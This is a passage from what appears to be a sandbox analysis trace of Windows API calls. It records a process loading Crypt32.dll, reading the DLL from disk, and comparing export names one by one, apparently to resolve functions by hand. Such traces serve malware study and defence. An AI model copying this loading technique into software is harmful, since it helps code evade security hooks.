lpString2="BCryptCreateMultiHash") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0111.608] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0111.609] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0111.610] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0111.611] GetProcessHeap () returned 0x4f0000 [0111.611] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x2cf2010 | out: hHeap=0x4f0000) returned 1 [0111.611] GetProcessHeap () returned 0x4f0000 [0111.611] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x5090d0 [0111.612] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0111.620] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0111.621] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0111.621] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0111.621] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0111.621] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0111.621] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0111.621] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0111.622] GetProcessHeap () returned 0x4f0000 [0111.622] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1c30e0) returned 0x40ba040 [0111.667] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0111.667] ReadFile (in: hFile=0x160, lpBuffer=0x40ba040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ba040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0111.923] CloseHandle (hObject=0x160) returned 1 [0111.923] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0111.923] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.923] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0111.923] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0111.924] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0111.924] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.924] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0111.925] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0111.926] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0111.926] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.927] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.927] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.928] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.928] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0111.928] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.929] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.930] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.930] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.930] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0111.930] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0111.931] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.931] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0111.932] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0111.932] 